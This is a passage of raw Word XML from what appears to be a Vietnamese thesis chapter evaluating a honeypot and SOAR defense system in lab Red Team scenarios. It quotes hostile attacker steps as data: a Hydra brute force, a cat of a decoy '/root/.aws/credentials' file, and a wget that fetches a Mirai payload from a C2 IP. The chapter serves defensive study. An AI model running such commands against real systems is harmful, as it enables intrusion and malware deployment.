                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Khởi tạo, nạp cấu hình YAML và điều phối luồng xử lý toàn hệ thống</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">pyyaml, sys, logging</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023B">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23C">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3D">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CHƯƠNG 5: THỬ NGHIỆM THỰC TẾ, ĐÁNH GIÁ VÀ PHÂN TÍCH TẤN CÔNG</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023E">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5.1 Thiết lập Môi trường Thử nghiệm Thực tế (Lab Setup)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000023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kiểm chứng toàn diện năng lực của Hệ thống Active Defense &amp; SOAR, môi trường thực nghiệm được thiết lập theo mô hình diễn tập Red Team vs. Blue Team trên hạ tầng mạng ảo hóa:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Máy chủ Blue Team (Phòng thủ &amp; Mini-SOC): Cấu hình Ubuntu Server 22.04 LTS, 4 vCPU, 8GB RAM, chạy Cowrie Honeypot (chuyển hướng cổng 22 sang 2222), dịch vụ Tarpit Endlessh tại cổng 22222 và toàn bộ hệ thống Python Orchestrator.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Máy trạm Red Team (Kẻ tấn công): Máy ảo Kali Linux 2024.1 trang bị các công cụ tấn công dò quét hàng đầu (Hydra, Medusa, Nmap, Metasploit Framework, Paramiko Brute-force Script).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Bộ công cụ Giả lập Tự động ('scripts/simulate_attack.py'): Được phát triển để tái hiện chính xác các chuỗi sự kiện tấn công phức tạp nhằm đo đạc thời gian đáp ứng chuẩn xác ở cấp độ mili-giây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000243">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5.2 Kịch bản 1: Mô phỏng Tấn công Dò quét SSH Brute-force &amp; Hiệu quả Chặn tức thời</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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kịch bản này, máy Red Team (IP: 185.220.101.5) sử dụng công cụ Hydra phát động cuộc tấn công từ điển nhắm vào tài khoản root với danh sách 100 mật khẩu phổ biến nhất. Tốc độ thử nghiệm là 10 request/giây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Diễn biến xử lý của Hệ thống SOAR:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Tại 4 lần thử đầu tiên, Cowrie ghi nhận sự kiện 'cowrie.login.failed', Correlation Engine cập nhật bộ đếm vào danh sách trượt thời gian.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Tại lần thử thứ 5 (đạt ngưỡng threshold = 5 trong 60 giây), Correlation Engine lập tức nâng cấp sự cố lên mức HIGH, gán nhãn kỹ thuật 'MITRE ATT&amp;CK T1110.001 - Brute Force: Password Guessing'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Playbook tự động của SOAR Enforcer được kích hoạt: chèn lệnh iptables DROP địa chỉ IP 185.220.101.5 trong thời gian 3600 giây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Toàn bộ tiến trình Hydra phía kẻ tấn công bị ngắt kết nối đột ngột (Connection Timed Out).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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5. Đồng thời, một Thẻ cảnh báo sự cố kèm kết quả trinh sát GeoIP (Đức / Tor Exit Node) và nút bấm can thiệp được gửi tới điện thoại của Chuyên viên SOC qua Telegram trong vòng 1.2 giây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024B">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5.3 Kịch bản 2: Hacker Xâm nhập Thành công và Kích hoạt Bẫy Honeytoken (Khử ẩn danh Real IP)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Trong kịch bản này, hacker sử dụng một máy chủ VPN tại Hà Lan (IP: 45.33.32.156) để dò trúng mật khẩu yếu 'password123' và đăng nhập thành công vào Honeypot:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Ngay khi đăng nhập, sự kiện 'cowrie.login.success' kích hoạt Cảnh báo Mức độ CRITICAL (MITRE T1078 - Valid Accounts). Hệ thống lập tức khởi động chế độ 'Silent Monitoring &amp; Deep Deception' thay vì chặn ngay, nhằm thu thập thêm bằng chứng.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Hacker tiến hành trinh sát nội bộ bằng các lệnh 'whoami', 'uname -a' (kích hoạt cảnh báo MITRE T1082).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000024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Hacker phát hiện tệp tin mồi nhử '/root/.aws/credentials' do HoneytokenManager gài sẵn và thực hiện lệnh 'cat' để đánh cắp (kích hoạt MITRE T1552.001).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Khử ẩn danh: Hacker sao chép thông tin tài khoản và đường link kiểm tra trong file về trình duyệt máy tính cá nhân thật tại Việt Nam để kiểm tra xem tài khoản AWS có hoạt động không. Ngay lập tức, Canary Webhook Server ghi nhận HTTP Request từ địa chỉ IP thật của hacker (ví dụ: 14.161.x.x - Mạng Viettel Internet cáp quang), đi kèm User-Agent trình duyệt Chrome trên Windows 11.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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5. Nhờ đó, lớp vỏ bọc VPN Hà Lan của hacker bị bóc trần hoàn toàn, định danh chính xác vị trí thực tế của thủ phạm.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000252">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5.4 Kịch bản 3: Tải Payload Độc hại lên Hệ thống và Phân tích Trích xuất IOCs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Hacker thực thi lệnh tải mã độc từ xa: 'wget http://194.87.139.12/mirai_payload.sh'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Cowrie tự động tải tệp tin về thư mục an toàn 'var/lib/cowrie/downloads' và phát sinh sự kiện 'cowrie.session.file_download' (kích hoạt MITRE T1105 - Ingress Tool Transfer).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Phân hệ 'PayloadAnalyzer' tự động tính toán mã băm SHA256 và bóc tách chuỗi tĩnh. Kết quả phát hiện đoạn mã có chứa địa chỉ IP máy chủ C2 '194.87.139.12' và chữ ký nhận dạng botnet 'dvrHelper' (Mirai variant).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Kết quả truy vấn VirusTotal API xác nhận đây là biến thể độc hại của dòng họ mã độc 'Trojan.Linux.Mirai' với tỷ lệ nhận diện 48/72 engines cảnh báo.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Toàn bộ các chỉ số IOCs (Hash, IP C2, URL tải) được tự động xuất bản vào Threat Feed chung để cảnh báo toàn bộ hệ thống.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000258">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5.5 Kịch bản 4: Kỹ thuật Giam lỏng Tarpit làm Kiệt quệ Luồng Tấn công của Botnet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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kiểm chứng năng lực làm tiêu hao tài nguyên đối phương, hệ thống chuyển sang chế độ phản ứng 'Tarpit Redirect' đối với IP tấn công:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025A">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Thay vì ngắt kết nối bằng DROP, toàn bộ gói tin TCP tới cổng SSH từ IP của hacker được chuyển hướng sang dịch vụ Tarpit tại cổng 22222. Tại đây, máy chủ chỉ gửi từng byte banner cách nhau 10 giây.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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Kết quả đo lường: Kẻ tấn công bị giam giữ liên tục 20 luồng socket trong trạng thái ESTABLISHED suốt hơn 45 phút. Tốc độ thử mật khẩu của đối phương bị sụt giảm từ 250 lần/phút xuống còn 0 lần/phút mà tiến trình quét của hacker không hề báo lỗi, làm cạn kiệt hoàn toàn bảng socket của botnet.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025C">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2926080"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586914"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486400"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5.1: Đo lường Hiệu quả Làm chậm &amp; Triệt tiêu Tấn công của Cơ chế Tarpit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025E">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5.6 Đánh giá Định lượng Hiệu năng: Thủ công (Manual SOC) vs Tự động hóa SOAR</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000025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chứng minh tính vượt trội về mặt kỹ thuật, một bài kiểm tra so sánh nghiêm ngặt đã được tiến hành giữa Quy trình phản ứng truyền thống của Chuyên viên SOC L1 và Nền tảng SOAR tự động hóa của đồ án:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000260">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5.1: Bảng so sánh định lượng thời gian phản ứng sự cố (MTTR)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table21"/>
        <w:tblW w:w="940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1"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
        <w:gridCol w:w="2351"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2351"/>
            <w:gridCol w:w="2351"/>
            <w:gridCol w:w="2351"/>
            <w:gridCol w:w="2351"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000261">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Giai đoạn Xử lý Sự cố</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000262">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Quy trình Thủ công (SOC L1)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000263">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hệ sinh thái SOAR Đồ án</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000264">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mức độ Tối ưu</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000265">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phát hiện &amp; Đọc log</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000266">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Chờ chuyên viên mở bảng điều khiển (3 - 5 phút)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000267">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Stream log thời gian thực (&lt; 200 ms)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000268">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nhanh hơn 1.500 lần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69">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
